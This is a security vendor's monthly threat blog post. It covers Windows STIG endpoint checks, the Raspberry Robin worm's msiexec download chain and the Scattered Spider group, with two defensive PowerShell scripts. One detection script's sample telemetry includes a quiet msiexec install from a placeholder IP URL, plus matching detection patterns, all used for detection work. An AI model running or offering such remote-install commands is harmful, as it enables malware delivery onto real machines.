Threat Thursday: February

Written by Trey Bilbrey | Feb 22, 2024 11:17:37 PM

This Threat Thursday covers Windows endpoint cyber hygiene, the worm-like malware Raspberry Robin, and the cybercriminal group Scattered Spider.

New Threat Releases

Windows Endpoint Hygiene

This release covers cyber hygiene for Windows endpoints: 15 essential STIG CAT I checks that validate the security posture of your endpoints, from confirming antivirus configuration to enforcing authentication requirements for Windows Remote Management (WinRM). It is available to all SCYTHE customers, so check the knowledge base and see where your endpoint hygiene stacks up.
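To show what a check of this kind looks like in practice, here is an added example (it is not SCYTHE's check content) that spot-checks the two areas named above on a Windows endpoint: antivirus state via the Defender cmdlets, and the WinRM client/service authentication and transport policies under the standard Group Policy registry path. It assumes Microsoft Defender is the antivirus in use and treats a 7-day signature age as the threshold (that number is an assumption, not a STIG value).

```powershell
# Added example, not SCYTHE's check content. Run from an elevated prompt on the endpoint.
# Assumptions: Microsoft Defender is the AV (Get-MpComputerStatus is available) and WinRM
# policy is set under the Group Policy registry path below. The 7-day signature age is a
# chosen threshold, not a value taken from the STIG.

$winrmPolicy = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\WinRM'

function Get-PolicyValue {
    param([string]$Path, [string]$Name)
    # Returns $null when the key or value is absent, i.e. the policy is "not configured".
    $item = Get-ItemProperty -Path $Path -Name $Name -ErrorAction SilentlyContinue
    if ($null -eq $item) { return $null }
    return $item.$Name
}

# Defender status; $null if the Defender module is unavailable (e.g. third-party AV installed).
$defender = Get-MpComputerStatus -ErrorAction SilentlyContinue

# Each check carries the observed value and a scriptblock that defines a pass.
# An absent policy value is a finding: the STIG requires the value to be set explicitly,
# so "not configured" is not good enough even where the default happens to be safe.
$checks = @(
    @{ Name = 'Antivirus enabled';                         Value = $defender.AntivirusEnabled;          Pass = { param($v) $v -eq $true } }
    @{ Name = 'Real-time protection enabled';              Value = $defender.RealTimeProtectionEnabled; Pass = { param($v) $v -eq $true } }
    @{ Name = 'AV signatures no older than 7 days';        Value = $defender.AntivirusSignatureAge;     Pass = { param($v) ($null -ne $v) -and ($v -le 7) } }
    @{ Name = 'WinRM client: Basic auth disabled';         Value = (Get-PolicyValue "$winrmPolicy\Client"  'AllowBasic');              Pass = { param($v) $v -eq 0 } }
    @{ Name = 'WinRM client: unencrypted traffic disabled'; Value = (Get-PolicyValue "$winrmPolicy\Client"  'AllowUnencryptedTraffic'); Pass = { param($v) $v -eq 0 } }
    @{ Name = 'WinRM service: Basic auth disabled';        Value = (Get-PolicyValue "$winrmPolicy\Service" 'AllowBasic');              Pass = { param($v) $v -eq 0 } }
    @{ Name = 'WinRM service: unencrypted traffic disabled'; Value = (Get-PolicyValue "$winrmPolicy\Service" 'AllowUnencryptedTraffic'); Pass = { param($v) $v -eq 0 } }
    @{ Name = 'WinRM service: RunAs credentials not stored'; Value = (Get-PolicyValue "$winrmPolicy\Service" 'DisableRunAs');            Pass = { param($v) $v -eq 1 } }
)

# Evaluate every check and build a report row per check.
$report = foreach ($check in $checks) {
    $observed = $check.Value
    $passed   = & $check.Pass $observed
    [pscustomobject]@{
        Check  = $check.Name
        Value  = $(if ($null -eq $observed) { 'not set' } else { $observed })
        Status = $(if ($passed) { 'PASS' } else { 'FINDING' })
    }
}

$report | Format-Table -AutoSize
$findings = @($report | Where-Object Status -eq 'FINDING').Count
Write-Host "$findings of $($report.Count) checks need attention"
```

The report deliberately distinguishes "not set" from a wrong value: a policy that is merely unconfigured can be flipped by a local administrator or a later GPO change, whereas an explicit value is what an auditor (and the STIG) expects to see.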

Empower IOC Releases

This month we want to highlight two of the four IOC sets we have created for Empower subscribers: one for the malware variant Raspberry Robin and one for the cybercriminal group Scattered Spider. Both have been gaining traction recently, with an uptick in compromises attributed to them.

Raspberry Robin

Raspberry Robin continues to serve as a significant attack vector and has more recently been identified as a precursor to ransomware campaigns. First reported by Red Canary in 2021, Raspberry Robin is a worm-like malware that typically uses removable media, such as USB drives, as its initial vector. It has since evolved into a widely distributed malicious downloader. Once an infected drive is plugged in and the malicious shortcut it carries is opened, the malware runs commands that download and install a malicious DLL via Windows Installer (msiexec.exe), then uses various evasion techniques to escalate privileges and bypass User Account Control (UAC). This DLL handles C2 communication, creates processes for possible persistence, and downloads additional payloads.
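The Windows Installer download step is the part of that chain a defender can see in process-creation telemetry, so here is an added example of detection logic for it. This is not SCYTHE's IOC set or Sigma rule; the sample events are constructed to carry Sysmon Event ID 1 field names (Image, CommandLine, ParentImage), and the IP address and hostnames in them are placeholders.

```powershell
# Added example, not SCYTHE's IOC or Sigma content. Flags msiexec.exe invocations
# that install a package straight from an http(s) URL, the behaviour described above,
# and reports supporting indicators (quiet install, launched from cmd.exe).
# -match is case-insensitive by default in PowerShell, so no (?i) is needed.

function Get-MsiexecRemoteInstallIndicators {
    param(
        [Parameter(Mandatory)] [string]$Image,
        [Parameter(Mandatory)] [string]$CommandLine,
        [string]$ParentImage = ''
    )
    # Only Windows Installer invocations are of interest.
    if ($Image -notmatch '(^|\\)msiexec\.exe$') { return @() }

    $indicators = @()
    # Install switch (/i or -i) whose package argument is an http(s) URL rather than a local path.
    if ($CommandLine -match '(^|\s)[/-]i\s+["'']?https?://') { $indicators += 'package fetched from URL' }
    # Quiet / reduced-UI install (/q, /qn, /qb, /qr, /quiet), which hides the Installer dialog.
    if ($CommandLine -match '(^|\s)[/-]q(n|b|r|uiet)?(\s|$)')  { $indicators += 'quiet install' }
    # Spawned by a command shell rather than explorer.exe or a deployment agent.
    if ($ParentImage -match '(^|\\)cmd\.exe$')                 { $indicators += 'parent is cmd.exe' }
    return $indicators
}

# Constructed sample events (not real telemetry); 203.0.113.7 is a documentation-range address.
$sampleEvents = @(
    [pscustomobject]@{ Image = 'C:\Windows\System32\msiexec.exe'; ParentImage = 'C:\Windows\System32\cmd.exe'
                       CommandLine = 'msiexec /q /i http://203.0.113.7:8080/a/b' }
    [pscustomobject]@{ Image = 'C:\Windows\System32\msiexec.exe'; ParentImage = 'C:\Windows\explorer.exe'
                       CommandLine = 'msiexec /i "C:\Users\alice\Downloads\tool-1.0.msi"' }
    [pscustomobject]@{ Image = 'C:\Windows\System32\msiexec.exe'; ParentImage = 'C:\Program Files\Deploy\agent.exe'
                       CommandLine = 'msiexec /qn /i https://updates.example.com/app-1.2.msi' }
)

# Alert only when the package source is a URL; the other indicators raise confidence.
$alerts = foreach ($event in $sampleEvents) {
    $hits = @(Get-MsiexecRemoteInstallIndicators -Image $event.Image -CommandLine $event.CommandLine -ParentImage $event.ParentImage)
    if ($hits -contains 'package fetched from URL') {
        [pscustomobject]@{
            Confidence  = $hits.Count
            Indicators  = ($hits -join ', ')
            CommandLine = $event.CommandLine
        }
    }
}
$alerts | Sort-Object Confidence -Descending | Format-Table -AutoSize
```

Of the three samples, the local install from Downloads never fires, the cmd.exe-spawned quiet install from a bare IP scores highest, and the HTTPS install from an internal update server still fires at a lower confidence. That last case is the tuning point: allowlist the deployment agent's parent image or the update host rather than dropping the URL condition, since a URL-sourced package is the behaviour you want to keep seeing. To run this over live telemetry, pull Event ID 1 from the Microsoft-Windows-Sysmon/Operational log with Get-WinEvent, convert each record with ToXml(), and read the Image, CommandLine and ParentImage Data elements by name rather than by position, which varies between Sysmon versions.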

Scattered Spider

Scattered Spider is a cybercriminal group also tracked as UNC3944, Storm-0875, LUCR-3, Octo Tempest, Roasted 0ktapus, and Scatter Swine. They use the access they gain at a victim company to target that company's third-party partners in turn. Recently they have been observed deploying ransomware on victim networks, notably ALPHV (BlackCat) ransomware, as recently as April 2023. Scattered Spider is rapidly gaining notoriety and emerging as a cybercriminal group that demands close attention in the cybersecurity landscape.

SCYTHE has packaged Scattered Spider IOCs as a threat for use in your SCYTHE platform, along with Sigma rules to aid in the detection of Scattered Spider activity.

Want to learn more about what SCYTHE's Empower offering can do for you? Reach out to us here.

March 26 Free Virtual Workshop - Detection Engineering

Register today! Learn the detection engineering process in this free three-hour workshop with Lead Adversary Emulation Engineer Trey Bilbrey. After walking through each step of the cycle, we will move into a hands-on workshop to put the method to practical use.

Save The Date for UniCon & SCYTHE Events

Save the date(s) for upcoming events featuring SCYTHE experts. Click here to see the full lineup! 

About the Author

Trey Bilbrey is a Lead Adversary Emulation Engineer at SCYTHE, specializing in purple team exercises, threat emulation, critical infrastructure, and holistic cyber operations. Trey's 15 years of industry experience have made him an excellent educator, defender of networks, and cultivator of cybersecurity professionals. Prior to joining SCYTHE, Trey held positions at Hack The Box (HTB Academy content developer) and the Army Corps of Engineers (ICS/SCADA penetration testing), and he is a veteran of the United States Marine Corps (defensive and offensive cyber operations). Current certifications include the CISSP, GICSP, GCIP, and K>FiveFour RTAC.

About SCYTHE

SCYTHE represents a paradigm shift in cybersecurity risk management, empowering organizations to Attack, Detect, and Respond efficiently. The SCYTHE platform enables collaboration between red, blue, and purple teams to build and emulate real-world adversarial campaigns. SCYTHE's innovative dual-deployment options and comprehensive features ensure a proactive cybersecurity approach. Headquartered in Arlington, VA, SCYTHE is privately funded by distinguished partners dedicated to shaping a more resilient cybersecurity landscape.